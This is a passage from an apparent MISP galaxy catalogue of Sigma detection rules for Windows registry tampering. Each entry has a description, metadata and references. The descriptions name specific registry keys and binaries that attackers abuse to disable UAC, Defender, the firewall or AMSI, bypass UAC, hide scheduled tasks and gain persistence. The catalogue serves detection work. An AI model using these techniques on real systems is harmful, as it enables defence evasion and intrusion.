UUID 28036918-04d3-423d-91c0-55ecf99fb892 which can be used as unique global reference for NET NGenAssemblyUsageLog Registry Key Tamper in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-11-18 |
| falsepositive | ['Unknown'] |
| filename | registry_set_net_cli_ngenassemblyusagelog.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Python Function Execution Security Warning Disabled In Excel - Registry
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
Internal MISP references
UUID 17e53739-a1fc-4a62-b1b9-87711c2d5e44 which can be used as unique global reference for Python Function Execution Security Warning Disabled In Excel - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), @Kostastsale |
| creation_date | 2024-08-23 |
| falsepositive | ['Unknown'] |
| filename | registry_set_office_disable_python_security_warnings.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
Internal MISP references
UUID 7021255e-5db3-4946-a8b9-0ba7a4644a69 which can be used as unique global reference for Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel |
| creation_date | 2023-08-02 |
| falsepositive | ['Unknown'] |
| filename | registry_set_provisioning_command_abuse.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
UAC Disabled
Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
Internal MISP references
UUID 48437c39-9e5f-47fb-af95-3d663c3f2919 which can be used as unique global reference for UAC Disabled in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-05 |
| falsepositive | ['Unknown'] |
| filename | registry_set_uac_disable.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
Add Debugger Entry To Hangs Key For Persistence
Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence; the configured debugger will get invoked when an application crashes.
Internal MISP references
UUID 833ef470-fa01-4631-a79b-6f291c9ac498 which can be used as unique global reference for Add Debugger Entry To Hangs Key For Persistence in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-21 |
| falsepositive | ['This value is not set by default but could be rarely used by administrators'] |
| filename | registry_set_hangs_debugger_persistence.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence'] |
New DNS ServerLevelPluginDll Installed
Detects the installation of a DNS plugin DLL via the ServerLevelPluginDll parameter in the registry, which can be used to execute code in the context of the DNS server (restart required).
Internal MISP references
UUID e61e8a88-59a9-451c-874e-70fcc9740d67 which can be used as unique global reference for New DNS ServerLevelPluginDll Installed in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - webarchive
- https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2017-05-08 |
| falsepositive | ['Unknown'] |
| filename | registry_set_dns_server_level_plugin_dll.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Registry Explorer Policy Modification
Detects registry modifications that disable internal tools or functions in Explorer (malware like Agent Tesla uses this technique).
Internal MISP references
UUID 1c3121ed-041b-4d97-a075-07f54f20fb4a which can be used as unique global reference for Registry Explorer Policy Modification in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-03-18 |
| falsepositive | ['Legitimate admin script'] |
| filename | registry_set_set_nopolicies_user.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Modification of IE Registry Settings
Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the Trusted Sites zone or insert JavaScript for persistence.
Internal MISP references
UUID d88d0ab2-e696-4d40-a2ed-9790064e66b3 which can be used as unique global reference for Modification of IE Registry Settings in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-22 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_ie.yml |
| level | low |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Disable Microsoft Defender Firewall via Registry
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.
Internal MISP references
UUID 974515da-6cc5-4c95-ae65-f97f9150ec7f which can be used as unique global reference for Disable Microsoft Defender Firewall via Registry in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-09 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disable_defender_firewall.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.004'] |
Related clusters
To see the related clusters, click here.
Enable Microsoft Dynamic Data Exchange
Detects enabling of the Dynamic Data Exchange (DDE) protocol in all supported editions of Microsoft Word or Excel.
Internal MISP references
UUID 63647769-326d-4dde-a419-b925cc0caf42 which can be used as unique global reference for Enable Microsoft Dynamic Data Exchange in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-26 |
| falsepositive | ['Unknown'] |
| filename | registry_set_office_enable_dde.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1559.002'] |
Related clusters
To see the related clusters, click here.
Folder Removed From Exploit Guard ProtectedFolders List - Registry
Detects the removal of folders from the "ProtectedFolders" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside a protected folder.
Internal MISP references
UUID 272e55a4-9e6b-4211-acb6-78f51f0b1b40 which can be used as unique global reference for Folder Removed From Exploit Guard ProtectedFolders List - Registry in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-05 |
| falsepositive | ['Legitimate administrators removing applications (should always be investigated)'] |
| filename | registry_delete_exploit_guard_protected_folders.yml |
| level | high |
| logsource.category | registry_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Removal Of SD Value to Hide Schedule Task - Registry
Detects removal of the SD (Security Descriptor) value under the \Schedule\TaskCache\Tree registry key in order to hide a scheduled task. This technique is used by the Tarrask malware.
Internal MISP references
UUID acd74772-5f88-45c7-956b-6a7b36c294d2 which can be used as unique global reference for Removal Of SD Value to Hide Schedule Task - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Sittikorn S |
| creation_date | 2022-04-15 |
| falsepositive | ['Unknown'] |
| filename | registry_delete_schtasks_hide_task_via_sd_value_removal.yml |
| level | medium |
| logsource.category | registry_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562'] |
Related clusters
To see the related clusters, click here.
Delete Defender Scan ShellEx Context Menu Registry Key
Detects deletion of the registry key that adds the 'Scan with Defender' option to the context menu. Attackers may use this to make it harder for users to scan files that are suspicious.
Internal MISP references
UUID 72a0369a-2576-4aaf-bfc9-6bb24a574ac6 which can be used as unique global reference for Delete Defender Scan ShellEx Context Menu Registry Key in MISP communities and other software using the MISP galaxy
External references
- https://research.splunk.com/endpoint/395ed5fe-ad13-4366-9405-a228427bdd91/ - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
- https://winaero.com/how-to-delete-scan-with-windows-defender-from-context-menu-in-windows-10/ - webarchive
- https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_defender_context_menu.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Matt Anderson (Huntress) |
| creation_date | 2025-07-11 |
| falsepositive | ['Unlikely as this weakens defenses and normally would not be done even if using another AV.'] |
| filename | registry_delete_defender_context_menu.yml |
| level | medium |
| logsource.category | registry_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Terminal Server Client Connection History Cleared - Registry
Detects the deletion of registry keys containing the MSTSC connection history.
Internal MISP references
UUID 07bdd2f5-9c58-4f38-aec8-e101bb79ef8d which can be used as unique global reference for Terminal Server Client Connection History Cleared - Registry in MISP communities and other software using the MISP galaxy
External references
- http://woshub.com/how-to-clear-rdp-connections-history/ - webarchive
- https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html - webarchive
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-10-19 |
| falsepositive | ['Unknown'] |
| filename | registry_delete_mstsc_history_cleared.yml |
| level | high |
| logsource.category | registry_delete |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1070', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Removal of Potential COM Hijacking Registry Keys
Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker, and the deletion could indicate steps to cover their tracks.
Internal MISP references
UUID 96f697b0-b499-4e5d-9908-a67bec11cdb6 which can be used as unique global reference for Removal of Potential COM Hijacking Registry Keys in MISP communities and other software using the MISP galaxy
External references
- https://github.com/OTRF/detection-hackathon-apt29/issues/7 - webarchive
- https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code - webarchive
- https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand - webarchive
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md - webarchive
- https://learn.microsoft.com/en-us/windows/win32/shell/launch - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2020-05-02 |
| falsepositive | ['Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered'] |
| filename | registry_delete_removal_com_hijacking_registry_key.yml |
| level | medium |
| logsource.category | registry_delete |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Removal Of AMSI Provider Registry Keys
Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
Internal MISP references
UUID 41d1058a-aea7-4952-9293-29eaaf516465 which can be used as unique global reference for Removal Of AMSI Provider Registry Keys in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - webarchive
- https://seclists.org/fulldisclosure/2020/Mar/45 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-06-07 |
| falsepositive | ['Unlikely'] |
| filename | registry_delete_removal_amsi_registry_key.yml |
| level | high |
| logsource.category | registry_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
Internal MISP references
UUID 5dfc1465-8f65-4fde-8eb5-6194380c6a62 which can be used as unique global reference for Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows/client-management/manage-recall - webarchive
- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_enable_windows_recall.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Sajid Nawaz Khan |
| creation_date | 2024-06-02 |
| falsepositive | ['Legitimate use/activation of Windows Recall'] |
| filename | registry_delete_enable_windows_recall.yml |
| level | medium |
| logsource.category | registry_delete |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1113'] |
Related clusters
To see the related clusters, click here.
RunMRU Registry Key Deletion - Registry
Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the Run dialog. In ClickFix techniques, phishing lures instruct users to open the Run dialog (Win + R) and execute malicious commands. Adversaries may delete this key to cover their tracks after executing commands.
Internal MISP references
UUID 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55 which can be used as unique global reference for RunMRU Registry Key Deletion - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-09-25 |
| falsepositive | ['Unknown'] |
| filename | registry_delete_runmru.yml |
| level | high |
| logsource.category | registry_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070.003'] |
Related clusters
To see the related clusters, click here.
Removal Of Index Value to Hide Schedule Task - Registry
Detects when the "index" value of a scheduled task is removed or deleted from the registry, which effectively hides the task from tooling such as "schtasks /query".
Internal MISP references
UUID 526cc8bc-1cdc-48ad-8b26-f19bff969cec which can be used as unique global reference for Removal Of Index Value to Hide Schedule Task - Registry in MISP communities and other software using the MISP galaxy
External references
- https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-26 |
| falsepositive | ['Unknown'] |
| filename | registry_delete_schtasks_hide_task_via_index_value_removal.yml |
| level | medium |
| logsource.category | registry_delete |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562'] |
Related clusters
To see the related clusters, click here.
Atbroker Registry Change
Detects creation/modification of Assistive Technology applications and persistence through usage of 'at'.
Internal MISP references
UUID 9577edbb-851f-4243-8c91-1d5b50c1a39b which can be used as unique global reference for Atbroker Registry Change in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Mateusz Wydra, oscd.community |
| creation_date | 2020-10-13 |
| falsepositive | ['Creation of non-default, legitimate at usage'] |
| filename | registry_event_susp_atbroker_change.yml |
| level | medium |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1218', 'attack.persistence', 'attack.t1547'] |
Related clusters
To see the related clusters, click here.
New PortProxy Registry Entry Added
Detects the modification of the PortProxy registry key which is used for port forwarding.
Internal MISP references
UUID a54f842a-3713-4b45-8c84-5f136fdebd3c which can be used as unique global reference for New PortProxy Registry Entry Added in MISP communities and other software using the MISP galaxy
External references
- https://adepts.of0x.cc/netsh-portproxy-code/ - webarchive
- https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html - webarchive
- https://www.dfirnotes.net/portproxy_detection/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Andreas Hunkeler (@Karneades) |
| creation_date | 2021-06-22 |
| falsepositive | ['WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)', 'Synergy Software KVM (https://symless.com/synergy)'] |
| filename | registry_event_portproxy_registry_key.yml |
| level | medium |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.defense-evasion', 'attack.command-and-control', 'attack.t1090'] |
Related clusters
To see the related clusters, click here.
New DLL Added to AppCertDlls Registry Key
Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
Internal MISP references
UUID 6aa1d992-5925-4e9f-a49b-845e51d1de01 which can be used as unique global reference for New DLL Added to AppCertDlls Registry Key in MISP communities and other software using the MISP galaxy
External references
- https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html - webarchive
- http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Ilyas Ochkov, oscd.community |
| creation_date | 2019-10-25 |
| falsepositive | ['Unknown'] |
| filename | registry_event_new_dll_added_to_appcertdlls_registry_key.yml |
| level | medium |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.009'] |
Related clusters
To see the related clusters, click here.
Windows Registry Trust Record Modification
Alerts on trust record modification within the registry, indicating usage of macros.
Internal MISP references
UUID 295a59c1-7b79-4b47-a930-df12c15fc9c2 which can be used as unique global reference for Windows Registry Trust Record Modification in MISP communities and other software using the MISP galaxy
External references
- https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/ - webarchive
- http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html - webarchive
- https://twitter.com/inversecos/status/1494174785621819397 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Antonlovesdnb, Trent Liffick (@tliffick) |
| creation_date | 2020-02-19 |
| falsepositive | ['This will alert on legitimate macro usage as well, additional tuning is required'] |
| filename | registry_event_office_trust_record_modification.yml |
| level | medium |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.initial-access', 'attack.t1566.001'] |
Related clusters
To see the related clusters, click here.
Windows Defender Threat Severity Default Action Modified
Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'. This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level, allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.
Internal MISP references
UUID 5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f which can be used as unique global reference for Windows Defender Threat Severity Default Action Modified in MISP communities and other software using the MISP galaxy
External references
- https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952 - webarchive
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - webarchive
- https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2 - webarchive
- https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference - webarchive
- https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_defender_threat_action_modified.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Matt Anderson (Huntress) |
| creation_date | 2025-07-11 |
| falsepositive | ['Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). Correlate with administrative activity.', 'Software installations that legitimately modify Defender settings (less common for these specific keys).'] |
| filename | registry_event_defender_threat_action_modified.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Registry Persistence Mechanisms in Recycle Bin
Detects persistence registry keys for the Recycle Bin.
Internal MISP references
UUID 277efb8f-60be-4f10-b4d3-037802f37167 which can be used as unique global reference for Registry Persistence Mechanisms in Recycle Bin in MISP communities and other software using the MISP galaxy
External references
- https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/ - webarchive
- https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf - webarchive
- https://persistence-info.github.io/Data/recyclebin.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-11-18 |
| falsepositive | ['Unknown'] |
| filename | registry_event_persistence_recycle_bin.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547'] |
Related clusters
To see the related clusters, click here.
Shell Open Registry Keys Manipulation
Detects manipulation of the shell open registry keys (exefile and ms-settings) used for persistence, and the UAC bypass pattern using fodhelper.exe, computerdefaults.exe or slui.exe via registry keys (e.g. UACMe 33 or 62).
Internal MISP references
UUID 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 which can be used as unique global reference for Shell Open Registry Keys Manipulation in MISP communities and other software using the MISP galaxy
External references
- https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]
- https://github.com/hfiref0x/UACME - webarchive
- https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ - webarchive
- https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-30 |
| falsepositive | ['Unknown'] |
| filename | registry_event_shell_open_keys_manipulation.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002', 'attack.t1546.001'] |
Related clusters
To see the related clusters, click here.
Run Once Task Configuration in Registry
Rule to detect the configuration of the Run Once registry key. The configured payload can be run by runonce.exe /AlternateShellStartup.
Internal MISP references
UUID c74d7efc-8826-45d9-b8bb-f04fac9e4eff which can be used as unique global reference for Run Once Task Configuration in Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Avneet Singh @v3t0_, oscd.community |
| creation_date | 2020-11-15 |
| falsepositive | ['Legitimate modification of the registry key by legitimate program'] |
| filename | registry_event_runonce_persistence.yml |
| level | medium |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Narrator's Feedback-Hub Persistence
Detects abuse of the Windows 10 Narrator's Feedback-Hub for persistence.
Internal MISP references
UUID f663a6d9-9d1b-49b8-b2b1-0637914d199a which can be used as unique global reference for Narrator's Feedback-Hub Persistence in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Dmitriy Lifanov, oscd.community |
| creation_date | 2019-10-25 |
| falsepositive | ['Unknown'] |
| filename | registry_event_narrator_feedback_persistance.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
Creation of a Local Hidden User Account by Registry
Sysmon registry detection of a local hidden user account.
Internal MISP references
UUID 460479f3-80b7-42da-9c43-2cc1d54dbccd which can be used as unique global reference for Creation of a Local Hidden User Account by Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-05-03 |
| falsepositive | ['Unknown'] |
| filename | registry_event_add_local_hidden_user.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1136.001'] |
Related clusters
To see the related clusters, click here.
UAC Bypass Via Wsreset
Detects an unfixed UAC bypass method on Windows 10. WSReset.exe is a file associated with the Windows Store; it will run a binary file referenced in a low-privilege registry key.
Internal MISP references
UUID 6ea3bf32-9680-422d-9f50-e90716b12a66 which can be used as unique global reference for UAC Bypass Via Wsreset in MISP communities and other software using the MISP galaxy
External references
- https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Wsreset - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | oscd.community, Dmitry Uchakin |
| creation_date | 2020-10-07 |
| falsepositive | ['Unknown'] |
| filename | registry_event_bypass_via_wsreset.yml |
| level | high |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
New DLL Added to AppInit_DLLs Registry Key
DLLs that are specified in the AppInit_DLLs value in the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll.
Internal MISP references
UUID 4f84b697-c9ed-4420-8ab5-e09af5b2345d which can be used as unique global reference for New DLL Added to AppInit_DLLs Registry Key in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Ilyas Ochkov, oscd.community, Tim Shelton |
| creation_date | 2019-10-25 |
| falsepositive | ['Unknown'] |
| filename | registry_event_new_dll_added_to_appinit_dlls_registry_key.yml |
| level | medium |
| logsource.category | registry_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.010'] |
Related clusters
To see the related clusters, click here.
Esentutl Volume Shadow Copy Service Keys
Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.
Internal MISP references
UUID 5aad0995-46ab-41bd-a9ff-724f41114971 which can be used as unique global reference for Esentutl Volume Shadow Copy Service Keys in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy - webarchive
